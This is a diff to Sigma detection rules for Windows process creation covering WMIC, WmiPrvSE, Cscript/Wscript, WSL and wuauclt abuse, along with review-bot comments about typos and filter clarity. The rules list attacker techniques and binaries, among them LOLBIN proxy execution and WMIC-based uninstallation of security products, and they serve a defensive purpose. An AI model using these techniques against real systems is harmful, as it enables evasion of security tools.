diff --git a/sigma/builtin/process_creation/proc_creation_win_wmic_susp_process_creation.yml b/sigma/builtin/process_creation/proc_creation_win_wmic_susp_process_creation.yml index a62421950..4fe02bef0 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmic_susp_process_creation.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmic_susp_process_creation.yml @@ -1,11 +1,10 @@ title: Suspicious Process Created Via Wmic.EXE id: 3c89a1e8-0fba-449e-8f1b-8409d6267ec8 related: - - id: 526be59f-a573-4eea-b5f7-f0973207634d - type: derived + - id: 526be59f-a573-4eea-b5f7-f0973207634d # Generic + type: derived status: test -description: Detects WMIC executing "process call create" with suspicious calls to - processes such as "rundll32", "regsrv32", etc. +description: Detects WMIC executing "process call create" with suspicious calls to processes such as "rundll32", "regsrv32", etc. references: - https://thedfirreport.com/2020/10/08/ryuks-return/ - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker @@ -23,11 +22,12 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - 'process ' - 'call ' - 'create ' - CommandLine|contains: + CommandLine|contains: + # Add more susupicious paths and binaries as you see fit in your env - rundll32 - bitsadmin - regsvr32 diff --git a/sigma/builtin/process_creation/proc_creation_win_wmic_terminate_application.yml b/sigma/builtin/process_creation/proc_creation_win_wmic_terminate_application.yml index 3679314cd..791d35d7f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmic_terminate_application.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmic_terminate_application.yml 
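Review bot: The reflowed description names `regsrv32`, which is not the binary the rule matches; the `CommandLine|contains` list below uses `regsvr32`, so the description should read `description: Detects WMIC executing "process call create" with suspicious calls to processes such as "rundll32", "regsvr32", etc.`. The new comment in the second hunk also has a typo, `susupicious`; suggest `# Add more suspicious paths and binaries as you see fit in your env`.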
@@ -1,11 +1,10 @@ title: Application Terminated Via Wmic.EXE id: 49d9671b-0a0a-4c09-8280-d215bfd30662 related: - - id: 847d5ff3-8a31-4737-a970-aeae8fe21765 - type: derived + - id: 847d5ff3-8a31-4737-a970-aeae8fe21765 # Uninstall Security Products + type: derived status: experimental -description: Detects calls to the "terminate" function via wmic in order to kill an - application +description: Detects calls to the "terminate" function via wmic in order to kill an application references: - https://cyble.com/blog/lockfile-ransomware-using-proxyshell-attack-to-deploy-ransomware/ - https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf @@ -22,10 +21,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \WMIC.exe - - OriginalFileName: wmic.exe + - NewProcessName|endswith: \WMIC.exe + - OriginalFileName: wmic.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - call - terminate condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_wmic_uninstall_application.yml b/sigma/builtin/process_creation/proc_creation_win_wmic_uninstall_application.yml index cccf75edc..b1916a62d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmic_uninstall_application.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmic_uninstall_application.yml @@ -1,8 +1,8 @@ title: Application Removed Via Wmic.EXE id: b53317a0-8acf-4fd1-8de8-a5401e776b96 related: - - id: 847d5ff3-8a31-4737-a970-aeae8fe21765 - type: derived + - id: 847d5ff3-8a31-4737-a970-aeae8fe21765 # Uninstall Security Products + type: derived status: test description: Uninstall an application with wmic references: 
@@ -21,10 +21,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \WMIC.exe - - OriginalFileName: wmic.exe + - NewProcessName|endswith: \WMIC.exe + - OriginalFileName: wmic.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - call - uninstall condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_wmic_uninstall_security_products.yml b/sigma/builtin/process_creation/proc_creation_win_wmic_uninstall_security_products.yml index 0228f1536..f63dd5d2f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmic_uninstall_security_products.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmic_uninstall_security_products.yml @@ -1,11 +1,10 @@ title: Potential Tampering With Security Products Via WMIC id: 847d5ff3-8a31-4737-a970-aeae8fe21765 related: - - id: b53317a0-8acf-4fd1-8de8-a5401e776b96 - type: derived + - id: b53317a0-8acf-4fd1-8de8-a5401e776b96 # Generic Uninstall + type: derived status: test -description: Detects uninstallation or termination of security products using the - WMIC utility +description: Detects uninstallation or termination of security products using the WMIC utility references: - https://twitter.com/cglyer/status/1355171195654709249 - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/ @@ -26,26 +25,26 @@ detection: EventID: 4688 Channel: Security selection_cli_1: - CommandLine|contains|all: + CommandLine|contains|all: - wmic - 'product where ' - call - uninstall - /nointeractive selection_cli_2: - CommandLine|contains|all: + CommandLine|contains|all: - wmic - 'caption like ' - CommandLine|contains: + CommandLine|contains: - call delete - call terminate selection_cli_3: - CommandLine|contains|all: + CommandLine|contains|all: - 'process ' - 'where ' - delete selection_product: - CommandLine|contains: + CommandLine|contains: - '%carbon%' - '%cylance%' - '%endpoint%' 
diff --git a/sigma/builtin/process_creation/proc_creation_win_wmic_xsl_script_processing.yml b/sigma/builtin/process_creation/proc_creation_win_wmic_xsl_script_processing.yml index eab4f5e90..cd19b314d 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmic_xsl_script_processing.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmic_xsl_script_processing.yml @@ -1,16 +1,10 @@ title: XSL Script Execution Via WMIC.EXE id: 05c36dd6-79d6-4a9a-97da-3db20298ab2d status: test -description: 'Detects the execution of WMIC with the "format" flag to potentially - load XSL files. - - Adversaries abuse this functionality to execute arbitrary files while potentially - bypassing application whitelisting defenses. - - Extensible Stylesheet Language (XSL) files are commonly used to describe the processing - and rendering of data within XML files. - - ' +description: | + Detects the execution of WMIC with the "format" flag to potentially load XSL files. + Adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses. + Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md author: Timur Zinniatullin, oscd.community, Swachchhanda Shrawan Poudel @@ -27,12 +21,12 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: - - /format - - -format - NewProcessName|endswith: \wmic.exe + CommandLine|contains: + - /format # wmic process list /FORMAT /? + - -format # wmic process list -FORMAT /? + NewProcessName|endswith: \wmic.exe filter_main_known_format: - CommandLine|contains: + CommandLine|contains: - Format:List - Format:htable - Format:hform 
@@ -44,8 +38,7 @@ detection: - Format:csv condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - - WMIC.exe FP depend on scripts and administrative methods used in the monitored - environment. + - WMIC.exe FP depend on scripts and administrative methods used in the monitored environment. - Static format arguments - https://petri.com/command-line-wmi-part-3 level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_wmiprvse_spawning_process.yml b/sigma/builtin/process_creation/proc_creation_win_wmiprvse_spawning_process.yml index ab86731fe..d968cd457 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmiprvse_spawning_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmiprvse_spawning_process.yml @@ -1,10 +1,10 @@ title: WmiPrvSE Spawned A Process id: d21374ff-f574-44a7-9998-4a8c8bf33d7d related: - - id: 8a582fe2-0882-4b89-a82a-da6b2dc32937 - type: similar - - id: 692f0bec-83ba-4d04-af7e-e884a96059b6 - type: similar + - id: 8a582fe2-0882-4b89-a82a-da6b2dc32937 + type: similar + - id: 692f0bec-83ba-4d04-af7e-e884a96059b6 + type: similar status: stable description: Detects WmiPrvSE spawning a process references: 
@@ -26,18 +26,18 @@ detection: ParentProcessName|endswith: \WmiPrvSe.exe filter_logonid: SubjectLogonId: - - '0x3e7' - - 'null' + - '0x3e7' # LUID 999 for SYSTEM + - 'null' # too many false positives filter_system_user: - SubjectUserName|contains: + SubjectUserName|contains: # covers many language settings - AUTHORI - AUTORI filter_wmiprvse: - NewProcessName|endswith: \WmiPrvSE.exe + NewProcessName|endswith: \WmiPrvSE.exe filter_werfault: - NewProcessName|endswith: \WerFault.exe - filter_null: - SubjectLogonId: null + NewProcessName|endswith: \WerFault.exe + filter_null: # some backends need the null value in a separate expression + SubjectLogonId: condition: process_creation and (selection and not 1 of filter_*) falsepositives: - False positives are expected (e.g. in environments where WinRM is used legitimately) diff --git a/sigma/builtin/process_creation/proc_creation_win_wmiprvse_spawns_powershell.yml b/sigma/builtin/process_creation/proc_creation_win_wmiprvse_spawns_powershell.yml index 84b89f537..9293e08ff 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmiprvse_spawns_powershell.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmiprvse_spawns_powershell.yml 
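Review bot: `filter_null` now leaves `SubjectLogonId:` with an empty value, which the YAML loader reads as null, so it is functionally identical to the removed `SubjectLogonId: null` but looks like a truncated line, especially next to the quoted string `'null'` in `filter_logonid` a few lines above. Keeping the literal makes the intent visible: `SubjectLogonId: null # YAML null, kept in its own filter because some backends need it in a separate expression`. The quoted `'null'` entry in `filter_logonid` matches the text "null" rather than a missing value, which its `# too many false positives` comment could say explicitly so the two filters are not mistaken for duplicates.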
@@ -1,13 +1,12 @@ title: Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell id: 692f0bec-83ba-4d04-af7e-e884a96059b6 related: - - id: 8a582fe2-0882-4b89-a82a-da6b2dc32937 - type: similar - - id: d21374ff-f574-44a7-9998-4a8c8bf33d7d - type: similar + - id: 8a582fe2-0882-4b89-a82a-da6b2dc32937 + type: similar + - id: d21374ff-f574-44a7-9998-4a8c8bf33d7d + type: similar status: stable -description: Detects Powershell as a child of the WmiPrvSE process. Which could be - a sign of lateral movement via WMI. +description: Detects Powershell as a child of the WmiPrvSE process. Which could be a sign of lateral movement via WMI. references: - https://any.run/report/68bc255f9b0db6a0d30a8f2dadfbee3256acfe12497bf93943bc1eab0735e45e/a2385d6f-34f7-403c-90d3-b1f9d2a90a5e author: Markus Neis @Karneades @@ -27,12 +26,12 @@ detection: selection_parent: ParentProcessName|endswith: \WmiPrvSE.exe selection_img: - - NewProcessName|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - NewProcessName|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll condition: process_creation and (all of selection_*) falsepositives: - AppvClient diff --git a/sigma/builtin/process_creation/proc_creation_win_wmiprvse_susp_child_processes.yml b/sigma/builtin/process_creation/proc_creation_win_wmiprvse_susp_child_processes.yml index 47ea58528..0ac0d93bf 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wmiprvse_susp_child_processes.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wmiprvse_susp_child_processes.yml 
@@ -1,12 +1,12 @@ title: Suspicious WmiPrvSE Child Process id: 8a582fe2-0882-4b89-a82a-da6b2dc32937 related: - - id: 692f0bec-83ba-4d04-af7e-e884a96059b6 - type: similar - - id: d21374ff-f574-44a7-9998-4a8c8bf33d7d - type: similar - - id: 18cf6cf0-39b0-4c22-9593-e244bdc9a2d4 - type: obsoletes + - id: 692f0bec-83ba-4d04-af7e-e884a96059b6 + type: similar + - id: d21374ff-f574-44a7-9998-4a8c8bf33d7d + type: similar + - id: 18cf6cf0-39b0-4c22-9593-e244bdc9a2d4 + type: obsoletes status: test description: Detects suspicious and uncommon child processes of WmiPrvSE references: @@ -33,7 +33,8 @@ detection: selection_parent: ParentProcessName|endswith: \wbem\WmiPrvSE.exe selection_children_1: - NewProcessName|endswith: + # TODO: Add more LOLBINs or suspicious processes that make sens in your environment + NewProcessName|endswith: - \certutil.exe - \cscript.exe - \mshta.exe @@ -43,7 +44,8 @@ detection: - \verclsid.exe - \wscript.exe selection_children_2: - CommandLine|contains: + # This is in a separate selection due to the nature of FP generated with CMD + CommandLine|contains: - cscript - mshta - powershell @@ -51,16 +53,15 @@ detection: - regsvr32 - rundll32 - wscript - NewProcessName|endswith: \cmd.exe + NewProcessName|endswith: \cmd.exe filter_main_werfault: - NewProcessName|endswith: \WerFault.exe + NewProcessName|endswith: \WerFault.exe filter_main_wmiprvse: - NewProcessName|endswith: \WmiPrvSE.exe + NewProcessName|endswith: \WmiPrvSE.exe filter_main_msiexec: - CommandLine|contains: '/i ' - NewProcessName|endswith: \msiexec.exe - condition: process_creation and (selection_parent and 1 of selection_children_* - and not 1 of filter_main_*) + CommandLine|contains: '/i ' + NewProcessName|endswith: \msiexec.exe + condition: process_creation and (selection_parent and 1 of selection_children_* and not 1 of filter_main_*) falsepositives: - Unknown level: high 
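Review bot: The comment added in the second hunk has a typo, `make sens`; suggest `# TODO: Add more LOLBINs or suspicious processes that make sense in your environment`. In the last hunk, `filter_main_msiexec` drops every `msiexec.exe` child of WmiPrvSE whose command line contains `/i `, regardless of where the package is loaded from; the commit only re-indents it, but a one-line comment on why that path is trusted (or a note that package location should be reviewed separately) would help the next reader tune it.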
diff --git a/sigma/builtin/process_creation/proc_creation_win_wpbbin_potential_persistence.yml b/sigma/builtin/process_creation/proc_creation_win_wpbbin_potential_persistence.yml index 1e34eaafa..248a9bd17 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wpbbin_potential_persistence.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wpbbin_potential_persistence.yml @@ -1,8 +1,7 @@ title: UEFI Persistence Via Wpbbin - ProcessCreation id: 4abc0ec4-db5a-412f-9632-26659cddf145 status: test -description: Detects execution of the binary "wpbbin" which is used as part of the - UEFI based persistence method described in the reference section +description: Detects execution of the binary "wpbbin" which is used as part of the UEFI based persistence method described in the reference section references: - https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c - https://persistence-info.github.io/Data/wpbbin.html @@ -20,10 +19,9 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName: C:\Windows\System32\wpbbin.exe + NewProcessName: C:\Windows\System32\wpbbin.exe condition: process_creation and selection falsepositives: - - Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks - @0gtweet for the tip) + - Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip) level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_wscript_cscript_script_exec.yml b/sigma/builtin/process_creation/proc_creation_win_wscript_cscript_script_exec.yml index 96ad66f86..3a246cc65 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wscript_cscript_script_exec.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wscript_cscript_script_exec.yml 
@@ -1,11 +1,10 @@ title: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript id: 1e33157c-53b1-41ad-bbcc-780b80b58288 related: - - id: 23250293-eed5-4c39-b57a-841c8933a57d - type: obsoletes + - id: 23250293-eed5-4c39-b57a-841c8933a57d + type: obsoletes status: test -description: Detects script file execution (.js, .jse, .vba, .vbe, .vbs, .wsf) by - Wscript/Cscript +description: Detects script file execution (.js, .jse, .vba, .vbe, .vbs, .wsf) by Wscript/Cscript author: Michael Haag date: 2019/01/16 modified: 2023/05/15 @@ -21,14 +20,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - OriginalFileName: - - wscript.exe - - cscript.exe - - NewProcessName|endswith: - - \wscript.exe - - \cscript.exe + - OriginalFileName: + - wscript.exe + - cscript.exe + - NewProcessName|endswith: + - \wscript.exe + - \cscript.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - .js - .jse - .vba @@ -37,7 +36,6 @@ detection: - .wsf condition: process_creation and (all of selection_*) falsepositives: - - Some additional tuning is required. It is recommended to add the user profile - path in CommandLine if it is getting too noisy. + - Some additional tuning is required. It is recommended to add the user profile path in CommandLine if it is getting too noisy. level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_wscript_cscript_susp_child_processes.yml b/sigma/builtin/process_creation/proc_creation_win_wscript_cscript_susp_child_processes.yml index c7dd8f6db..a8408d712 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wscript_cscript_susp_child_processes.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wscript_cscript_susp_child_processes.yml 
@@ -1,14 +1,9 @@ title: Cscript/Wscript Potentially Suspicious Child Process id: b6676963-0353-4f88-90f5-36c20d443c6a status: experimental -description: 'Detects potentially suspicious child processes of Wscript/Cscript. These - include processes such as rundll32 with uncommon exports or PowerShell spawning - rundll32 or regsvr32. - - Malware such as Pikabot and Qakbot were seen using similar techniques as well - as many others. - - ' +description: | + Detects potentially suspicious child processes of Wscript/Cscript. These include processes such as rundll32 with uncommon exports or PowerShell spawning rundll32 or regsvr32. + Malware such as Pikabot and Qakbot were seen using similar techniques as well as many others. references: - Internal Research - https://github.com/pr0xylife/Pikabot/blob/main/Pikabot_30.10.2023.txt 
@@ -30,32 +25,30 @@ detection: - \wscript.exe - \cscript.exe selection_cli_script_main: - NewProcessName|endswith: + NewProcessName|endswith: - \cmd.exe - \powershell.exe - \pwsh.exe + # Note: Add other combinations that are suspicious selection_cli_script_option_mshta: - CommandLine|contains|all: + CommandLine|contains|all: - mshta - http selection_cli_script_option_other: - CommandLine|contains: + CommandLine|contains: - rundll32 - regsvr32 - msiexec selection_cli_standalone: - NewProcessName|endswith: \rundll32.exe + NewProcessName|endswith: \rundll32.exe filter_main_rundll32_known_exports: - CommandLine|contains: + CommandLine|contains: - UpdatePerUserSystemParameters - PrintUIEntry - ClearMyTracksByProcess - NewProcessName|endswith: \rundll32.exe - condition: process_creation and (selection_parent and ( selection_cli_standalone - or (selection_cli_script_main and 1 of selection_cli_script_option_*) ) and - not 1 of filter_main_*) + NewProcessName|endswith: \rundll32.exe + condition: process_creation and (selection_parent and ( selection_cli_standalone or (selection_cli_script_main and 1 of selection_cli_script_option_*) ) and not 1 of filter_main_*) falsepositives: - - Some false positives might occur with admin or third party software scripts. - Investigate and apply additional filters accordingly. + - Some false positives might occur with admin or third party software scripts. Investigate and apply additional filters accordingly. level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_wscript_cscript_uncommon_extension_exec.yml b/sigma/builtin/process_creation/proc_creation_win_wscript_cscript_uncommon_extension_exec.yml index b9d734f41..08b9f0400 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wscript_cscript_uncommon_extension_exec.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wscript_cscript_uncommon_extension_exec.yml 
@@ -1,8 +1,7 @@ title: Cscript/Wscript Uncommon Script Extension Execution id: 99b7460d-c9f1-40d7-a316-1f36f61d52ee status: experimental -description: Detects Wscript/Cscript executing a file with an uncommon (i.e. non-script) - extension +description: Detects Wscript/Cscript executing a file with an uncommon (i.e. non-script) extension author: Nasreddine Bencherchali (Nextron Systems) date: 2023/05/15 modified: 2023/06/19 @@ -18,14 +17,16 @@ detection: EventID: 4688 Channel: Security selection_img: - - OriginalFileName: - - wscript.exe - - cscript.exe - - NewProcessName|endswith: - - \wscript.exe - - \cscript.exe + - OriginalFileName: + - wscript.exe + - cscript.exe + - NewProcessName|endswith: + - \wscript.exe + - \cscript.exe selection_extension: - CommandLine|contains: + CommandLine|contains: + # Note: add additional potential suspicious extension + # We could specify the "//E:" flag to avoid typos by admin. But since that's prone to blind spots via the creation of assoc it's better not to include it - .csv - .dat - .doc diff --git a/sigma/builtin/process_creation/proc_creation_win_wsl_child_processes_anomalies.yml b/sigma/builtin/process_creation/proc_creation_win_wsl_child_processes_anomalies.yml index 1380c2be9..dd779d541 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wsl_child_processes_anomalies.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wsl_child_processes_anomalies.yml 
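Review bot: The two comments added under `CommandLine|contains` in the second hunk are hard to parse: `# Note: add additional potential suspicious extension` should read `# Note: add additional potentially suspicious extensions as needed`, and the second one would be clearer as `# The "//E:" engine flag is deliberately not required here: it would miss executions that rely on file associations (assoc) instead of the flag`. The detection logic itself is unchanged by the hunk.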
@@ -1,12 +1,10 @@ title: WSL Child Process Anomaly id: 2267fe65-0681-42ad-9a6d-46553d3f3480 related: - - id: dec44ca7-61ad-493c-bfd7-8819c5faa09b - type: derived + - id: dec44ca7-61ad-493c-bfd7-8819c5faa09b # LOLBIN Rule + type: derived status: experimental -description: Detects uncommon or suspicious child processes spawning from a WSL process. - This could indicate an attempt to evade parent/child relationship detections or - persistence attempts via cron using WSL +description: Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/ - https://twitter.com/nas_bench/status/1535431474429808642 @@ -30,7 +28,8 @@ detection: - \wsl.exe - \wslhost.exe selection_children_images: - NewProcessName|endswith: + NewProcessName|endswith: + # Add more suspicious/uncommon "lolbin" processes - \calc.exe - \cmd.exe - \cscript.exe @@ -41,7 +40,7 @@ detection: - \rundll32.exe - \wscript.exe selection_children_paths: - NewProcessName|contains: + NewProcessName|contains: - \AppData\Local\Temp\ - C:\Users\Public\ - C:\Windows\Temp\ diff --git a/sigma/builtin/process_creation/proc_creation_win_wsl_lolbin_execution.yml b/sigma/builtin/process_creation/proc_creation_win_wsl_lolbin_execution.yml index 5faa39de4..1ce2bc598 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wsl_lolbin_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wsl_lolbin_execution.yml 
@@ -1,11 +1,10 @@ title: Arbitrary Command Execution Using WSL id: dec44ca7-61ad-493c-bfd7-8819c5faa09b related: - - id: 2267fe65-0681-42ad-9a6d-46553d3f3480 - type: similar + - id: 2267fe65-0681-42ad-9a6d-46553d3f3480 # Generic susp child processes rules + type: similar status: test -description: Detects potential abuse of Windows Subsystem for Linux (WSL) binary as - a LOLBIN to execute arbitrary Linux or Windows commands +description: Detects potential abuse of Windows Subsystem for Linux (WSL) binary as a LOLBIN to execute arbitrary Linux or Windows commands references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/ - https://twitter.com/nas_bench/status/1535431474429808642 
@@ -25,28 +24,31 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \wsl.exe - - OriginalFileName: wsl.exe + - NewProcessName|endswith: \wsl.exe + - OriginalFileName: wsl.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' -e ' - ' --exec' - ' --system' - ' --shell-type ' - - ' /mnt/c' + - ' /mnt/c' # Path to mounted "C:\" partition (Indication of running Windows binaries via WSL) - ' --user root' - ' -u root' - --debug-shell filter_main_kill: - CommandLine|contains|all: + # This filter is to handle a FP that occurs when a process is spawned from WSL and then closed by the user + # Example would be to open VsCode through it's server extension from WSL + # GrandparentCommandLine: "C:\Users\XXX\AppData\Local\Programs\Microsoft VS Code\Code.exe" --ms-enable-electron-run-as-node c:\Users\XXX\.vscode\extensions\ms-vscode-remote.remote-wsl-0.72.0\dist\wslDaemon.js + # ParentCommandLine: C:\WINDOWS\system32\cmd.exe /d /s /c "C:\WINDOWS\System32\wsl.exe -d Ubuntu-20.04 -e kill 1366" + # CommandLine: C:\WINDOWS\System32\wsl.exe -d Ubuntu-20.04 -e kill 1366 + CommandLine|contains|all: - ' -d ' - ' -e kill ' ParentProcessName|endswith: \cmd.exe condition: process_creation and (all of selection_* and not 1 of filter_main_*) falsepositives: - - Automation and orchestration scripts may use this method to execute scripts - etc. - - Legitimate use by Windows to kill processes opened via WSL (example VsCode WSL - server) + - Automation and orchestration scripts may use this method to execute scripts etc. + - Legitimate use by Windows to kill processes opened via WSL (example VsCode WSL server) level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_wuauclt_dll_loading.yml b/sigma/builtin/process_creation/proc_creation_win_wuauclt_dll_loading.yml index 2175c829f..76da03823 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wuauclt_dll_loading.yml 
+++ b/sigma/builtin/process_creation/proc_creation_win_wuauclt_dll_loading.yml @@ -1,18 +1,16 @@ title: Proxy Execution Via Wuauclt.EXE id: af77cf95-c469-471c-b6a0-946c685c4798 related: - - id: ba1bb0cb-73da-42de-ad3a-de10c643a5d0 - type: obsoletes - - id: d7825193-b70a-48a4-b992-8b5b3015cc11 - type: obsoletes + - id: ba1bb0cb-73da-42de-ad3a-de10c643a5d0 + type: obsoletes + - id: d7825193-b70a-48a4-b992-8b5b3015cc11 + type: obsoletes status: test -description: Detects the use of the Windows Update Client binary (wuauclt.exe) for - proxy execution. +description: Detects the use of the Windows Update Client binary (wuauclt.exe) for proxy execution. references: - https://dtm.uk/wuauclt/ - https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/ -author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth - (Nextron Systems), Sreeman, FPT.EagleEye Team +author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team date: 2020/10/12 modified: 2023/11/11 tags: 
@@ -27,22 +25,24 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \wuauclt.exe - - OriginalFileName: wuauclt.exe + - NewProcessName|endswith: \wuauclt.exe + - OriginalFileName: wuauclt.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - UpdateDeploymentProvider - RunHandlerComServer filter_main_generic: - CommandLine|contains: ' /UpdateDeploymentProvider UpdateDeploymentProvider.dll ' + # Note: Please enhance this if you find the full path + CommandLine|contains: ' /UpdateDeploymentProvider UpdateDeploymentProvider.dll ' filter_main_wuaueng: - CommandLine|contains: ' wuaueng.dll ' + # Note: Please enhance this if you find the full path + CommandLine|contains: ' wuaueng.dll ' filter_main_uus: - CommandLine|contains: + CommandLine|contains: - :\Windows\UUS\Packages\Preview\amd64\updatedeploy.dll /ClassId - :\Windows\UUS\amd64\UpdateDeploy.dll /ClassId filter_main_winsxs: - CommandLine|contains|all: + CommandLine|contains|all: - :\Windows\WinSxS\ - '\UpdateDeploy.dll /ClassId ' condition: process_creation and (all of selection_* and not 1 of filter_main_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_wuauclt_no_cli_flags_execution.yml b/sigma/builtin/process_creation/proc_creation_win_wuauclt_no_cli_flags_execution.yml index 2c177c4c7..5721b4a35 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wuauclt_no_cli_flags_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wuauclt_no_cli_flags_execution.yml 
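Review bot: `filter_main_generic` and `filter_main_wuaueng` exclude on a bare DLL file name (`' /UpdateDeploymentProvider UpdateDeploymentProvider.dll '`, `' wuaueng.dll '`) rather than on a path, so the exclusion cannot tell from which directory the named DLL was loaded, unlike `filter_main_uus` and `filter_main_winsxs` which anchor on `:\Windows\...`. The two added `# Note: Please enhance this if you find the full path` comments acknowledge this, but the limitation is only visible to someone reading the detection block. Suggest recording it where rule consumers look, e.g. a `falsepositives` entry such as `- The name-only filters for UpdateDeploymentProvider.dll and wuaueng.dll do not verify the DLL location; tune once the legitimate full path is confirmed`. The `falsepositives` section of this file lies outside the hunk.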
@@ -1,10 +1,8 @@ title: Suspicious Windows Update Agent Empty Cmdline id: 52d097e2-063e-4c9c-8fbb-855c8948d135 status: test -description: 'Detects suspicious Windows Update Agent activity in which a wuauclt.exe - process command line doesn''t contain any command line flags - - ' +description: | + Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags references: - https://redcanary.com/blog/blackbyte-ransomware/ author: Florian Roth (Nextron Systems) @@ -21,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \Wuauclt.exe - - OriginalFileName: Wuauclt.exe + - NewProcessName|endswith: \Wuauclt.exe + - OriginalFileName: Wuauclt.exe selection_cli: - CommandLine|endswith: + CommandLine|endswith: - Wuauclt - Wuauclt.exe condition: process_creation and (all of selection*) diff --git a/sigma/builtin/process_creation/proc_creation_win_wusa_cab_files_extraction.yml b/sigma/builtin/process_creation/proc_creation_win_wusa_cab_files_extraction.yml index 427d5ae49..8f7da50e9 100644 --- a/sigma/builtin/process_creation/proc_creation_win_wusa_cab_files_extraction.yml +++ b/sigma/builtin/process_creation/proc_creation_win_wusa_cab_files_extraction.yml 
@@ -1,9 +1,7 @@ title: Wusa Extracting Cab Files id: 59b39960-5f9d-4a49-9cef-1e4d2c1d0cb9 status: test -description: Detects usage of the "wusa.exe" (Windows Update Standalone Installer) - utility to extract cab using the "/extract" argument which is not longer supported. - This could indicate an attacker using an old technique +description: Detects usage of the "wusa.exe" (Windows Update Standalone Installer) utility to extract cab using the "/extract" argument which is not longer supported. This could indicate an attacker using an old technique references: - https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html author: Nasreddine Bencherchali (Nextron Systems) @@ -18,11 +16,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: '/extract:' - NewProcessName|endswith: \wusa.exe + CommandLine|contains: '/extract:' + NewProcessName|endswith: \wusa.exe condition: process_creation and selection falsepositives: - - The "extract" flag still works on older 'wusa.exe' versions, which could be - a legitimate use (monitor the path of the cab being extracted) + - The "extract" flag still works on older 'wusa.exe' versions, which could be a legitimate use (monitor the path of the cab being extracted) level: medium ruletype: Sigma diff --git 